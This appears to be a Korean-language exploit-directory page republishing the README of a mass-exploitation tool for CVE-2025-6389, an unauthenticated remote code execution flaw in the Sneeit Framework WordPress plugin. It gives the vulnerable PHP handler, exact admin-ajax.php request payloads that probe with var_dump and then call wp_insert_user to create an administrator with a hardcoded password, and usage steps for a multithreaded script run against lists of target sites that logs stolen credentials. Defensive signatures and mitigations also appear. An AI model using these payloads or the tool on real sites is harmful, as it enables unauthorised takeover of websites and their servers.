Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-6389 — Sneeit Framework <= 8.3 - sneeit_articles_pagination_callback에서의 인증되지 않은 원격 코드 실행 | Kitploit
도구/GitHubGitHub/nxploited/cve-2025-6389
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationRed Teaming
GitHubnxploited/cve-2025-6389

CVE-2025-6389

Sneeit Framework <= 8.3 - sneeit_articles_pagination_callback에서의 인증되지 않은 원격 코드 실행

저장소 보기
14개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-6389

Sneeit Framework <= 8.3 - sneeit_articles_pagination_callback에서의 인증되지 않은 원격 코드 실행

root@kitploit:~
    _______      ________    ___   ___ ___  _____         __ ____   ___   ___  
  / ____\ \    / /  ____|  |__ \ / _ \__ \| ____|       / /|___ \ / _ \ / _ \ 
 | |     \ \  / /| |__ ______ ) | | | | ) | |__ ______ / /_  __) | (_) | (_) |
 | |      \ \/ / |  __|______/ /| | | |/ /|___ \______| '_ \|__ < > _ < \__, |
 | |____   \  /  | |____    / /_| |_| / /_ ___) |     | (_) |__) | (_) |  / / 
  \_____|   \/   |______|  |____|\___|/____|____/       \___/____/ \___/  /_/  

Telegram CVE CVSS Python License


📡 다음 공개를 놓치지 마세요. Telegram에서 @KNxploited 를 팔로우하세요 — 새로 공개된 CVE, 동작하는 익스플로잇, 정예 보안 연구를 위한 최고의 채널입니다. 가장 먼저 알게 됩니다. 가장 먼저 행동하게 됩니다.


🧠 개요

CVE-2025-6389는 WordPress용 Sneeit Framework 플러그인에서 발견된 CVSS 9.8 Critical 등급의 원격 코드 실행 취약점입니다.

이 결함은 sneeit_articles_pagination_callback() 함수에 존재하며, 이 함수는 사용자가 제공한 입력값을 PHP의 call_user_func()에 무비판적으로 전달합니다. 즉, 인증되지 않은 공격자가 wp_insert_user를 포함한 임의의 PHP 함수를 임의의 인자로 호출할 수 있으며, 이를 통해 사실상 완전한 관리자 액세스 권한을 획득하거나 서버 측 코드를 실행할 수 있습니다.


💀 취약점 심층 분석

근본 원인은 플러그인의 AJAX 핸들러에서 PHP의 call_user_func()를 잘못 사용한 데 있습니다:

root@kitploit:~
// 인증 확인 없이 등록됨
add_action('wp_ajax_nopriv_sneeit_articles_pagination', 'sneeit_articles_pagination_callback');

function sneeit_articles_pagination_callback() {
    $callback = $_POST['callback'];  // ← 사용자가 제어하는 함수 이름
    $args     = json_decode(stripslashes($_POST['args']), true); // ← 사용자가 제어하는 인자

    // 검증 없이 임의의 PHP 함수를 임의의 인자로 호출
    $result = call_user_func($callback, ...$args);

    echo $result;
    die();
}

이것이 치명적인 이유:

  • wp_ajax_nopriv_* = 로그인 없이 누구나 접근 가능
  • call_user_func($callback, $args) = 임의 함수 호출
  • 공격자는 var_dump, system, wp_insert_user, eval 또는 모든 PHP/WordPress 함수를 호출할 수 있음
  • 응답이 직접 반환되므로 블라인드 및 비블라인드(verbose) RCE가 모두 가능

⚔️ 익스플로잇 체인

root@kitploit:~
Step 1 — 프로브 / 핑거프린팅
──────────────────────────────────────────────────────────────────
POST /wp-admin/admin-ajax.php
  action   = sneeit_articles_pagination
  callback = var_dump
  args     = ["test"]

예상 응답 → array(1) { [0]=> string(4) "test" }
  ↓
확인됨: call_user_func()에 도달 가능하며 출력이 반영됨

──────────────────────────────────────────────────────────────────
Step 2 — 관리자 계정 생성
──────────────────────────────────────────────────────────────────
POST /wp-admin/admin-ajax.php
  action   = sneeit_articles_pagination
  callback = wp_insert_user
  args     = {"user_login":"Nxploited_XXXX",
               "user_pass":"xplpass",
               "user_email":"...",
               "role":"administrator"}

결과 → 대상에 새 관리자 계정이 조용히 생성됨
  ↓
전체 WordPress 관리자 패널 액세스 권한 획득 ✔️

⚙️ 요구 사항

root@kitploit:~
pip install requests rich
종속성용도
requests세션/프록시 지원이 포함된 HTTP 요청
rich실시간 터미널 대시보드, 패널, 진행 표시
threading다중 대상 동시 처리

Python 3.8+ 필요. 타입 힌트는 3.9+에서 도입된 tuple[...] 구문을 사용하므로 최상의 호환성을 위해 3.9+ 사용을 권장합니다.


📂 파일 구조

root@kitploit:~
CVE-2025-6389/
├── CVE-2025-6389.py          # 메인 익스플로잇 스크립트
├── list.txt                  # 대상 URL — 줄당 하나씩
├── success_results.txt       # 자동 생성: 성공한 대상 + 자격 증명
└── debug_responses/          # 자동 생성: 디버깅용 원시 서버 응답
    └── <target>.resp.txt

🚀 사용법

1단계 — 대상 준비

줄당 하나의 URL로 list.txt를 생성하세요:

root@kitploit:~
https://target1.com
https://target2.com
http://target3.com

http:// 또는 https://가 없는 URL에는 자동으로 http://가 접두사로 추가됩니다.


2단계 — 익스플로잇 실행

root@kitploit:~
python CVE-2025-6389.py

다음과 같은 프롬프트가 표시됩니다:

root@kitploit:~
Targets file name (default list.txt): list.txt
Number of threads (default 10):       20

3단계 — 실시간 대시보드

이 스크립트는 실시간 Rich 대시보드를 실행하여 다음을 표시합니다:

root@kitploit:~
┌─────────────────────────────────────────────────────────────────────┐
│  [ASCII BANNER]                                                      │
├──────────────────────────────┬──────────────────────────────────────┤
│  Info                        │  Stats                               │
│  Usage: Put targets in...    │  Total Targets:  150                 │
│  Threads: 20                 │  Processed:      87                  │
│  Password: xplpass           │  Successes:      12                  │
│  Success Log: success...     │  Failures:       75                  │
│  Debug Dir: debug_responses  │  Elapsed:        00:01:43            │
├──────────────────────────────┴──────────────────────────────────────┤
│  Recent Results                                                      │
│  Time     Target                              Result                 │
│  14:23:01 https://victim.com                  SUCCESS               │
│  14:23:03 https://example.net                 FAIL                  │
└─────────────────────────────────────────────────────────────────────┘

4단계 — 결과 검토

성공한 익스플로잇은 success_results.txt에 저장됩니다:

root@kitploit:~
https://victim.com | USER: Nxploited_4821 | PASS: xplpass | EMAIL: [email protected]

디버그 응답(실패한 대상의 경우)은 debug_responses/ 아래에 저장됩니다:

root@kitploit:~
debug_responses/
└── https___victim.com.resp.txt   ← 분석용 원시 서버 응답

🖥️ 스크립트 매개변수 참조


📊 탐지 시그니처

이 익스플로잇은 다음과 같은 네트워크 시그니처를 생성합니다 — 방어자와 WAF 규칙 작성자에게 유용합니다:

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

action=sneeit_articles_pagination&callback=<FUNCTION>&args=<JSON>

WAF / IDS 규칙 (의사코드):

root@kitploit:~
IF request.method == POST
AND request.path  == "/wp-admin/admin-ajax.php"
AND request.body CONTAINS "sneeit_articles_pagination"
AND request.body CONTAINS "callback"
THEN BLOCK + ALERT

🛡️ 완화 및 해결 방안

사이트 소유자, 개발자 또는 방어자라면 다음 단계를 즉시 수행하세요:

  • ✅ 패치가 제공되는 경우 Sneeit Framework를 8.3 이상 버전으로 업데이트
  • ✅ 패치된 버전이 확인될 때까지 플러그인을 비활성화하고 삭제
  • ✅ 최근에 생성된 WordPress 관리자 계정에서 무단 항목이 있는지 감사
  • ✅ 서버 측 입력 검증 구현 — call_user_func()에 사용자 입력을 절대 전달하지 말 것
  • ✅ WAF/방화벽 수준에서 admin-ajax.php에 대한 인증되지 않은 POST 요청 차단
  • ✅ 서버 로그에서 sneeit_articles_pagination AJAX 액션 호출 모니터링
  • ✅ 격리 조치로 모든 기존 관리자 계정에 2단계 인증 활성화

⚠️ 면책 조항

root@kitploit:~
이 도구는 교육, 승인된 침투 테스트 및 보안 연구 목적으로만 엄격히 제공됩니다.

이 스크립트를 다운로드, 실행 또는 수정함으로써 다음 사항에 명시적으로 동의하게 됩니다:

  • 테스트하는 모든 시스템 소유자로부터 명시적이고 서면화된 승인을
    받았습니다. 예외는 없습니다.

  • 통제된 실험실 환경 또는 공식적으로 범위가 지정되고 승인된
    계약 내에서 운영하고 있습니다.

  • 테스트할 법적 허가가 없는 시스템, 네트워크 또는 인프라에 대해
    이 도구를 배포하지 않을 것입니다.

  • Nxploited와 모든 기여자는 이 도구 사용으로 인해 발생하는 무단
    사용, 손해, 데이터 손실, 법적 조치 또는 형사 기소에 대해
    어떠한 책임도 지지 않습니다.

이 익스플로잇의 무단 사용은 다음 법률에 따라 범죄 행위입니다:
  — 미국 컴퓨터 사기 및 남용법 (CFAA)
  — 영국 컴퓨터 오용법 (CMA)
  — 정보 시스템 공격에 관한 EU 지침 2013/40/EU
  — 그리고 이에 상응하는 모든 국가 및 국제 사이버 범죄 법률

책임 있게 사용하세요. 윤리적으로 해킹하세요. 책임 있게 공개하세요.

👤 작성자

핸들Nxploited (Khaled Alenazi)
Telegram@KNxploited
GitHubgithub.com/Nxploited

🔔 Telegram에서 @KNxploited를 팔로우하세요 실제 익스플로잇이 가장 먼저 공개되는 채널 — CVE, 제로데이, PoC, 그리고 심층 취약점 연구까지. 정기적으로 업데이트됩니다. 계속 경계를 유지하세요.


정밀하게 제작: Nxploited · 승인된 보안 연구 전용 · CVSS 9.8 Critical
도구 다운로드
필드세부 정보
CVE IDCVE-2025-6389
플러그인Sneeit Framework (sneeit-framework)
영향을 받는 버전8.3 이하의 모든 버전
취약점 유형원격 코드 실행 (RCE)
공격 경로네트워크 — 인증 불필요
CVSS 3.1 점수9.8 CRITICAL
CVSS 벡터AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CNAWordfence
영향전체 서버 장악 / 관리자 계정 탈취
연구자Nxploited
queue스레드 안전 대상 분배
프롬프트기본값설명
대상 파일list.txt대상 URL이 포함된 파일
스레드 수10 (최대: 200)동시 작업자 — 대량 스캔 시 증가
비밀번호xplpass (하드코딩)생성된 관리자 계정에 설정되는 비밀번호
사용자 이름 형식Nxploited_XXXX4자리 랜덤 접미사로 자동 생성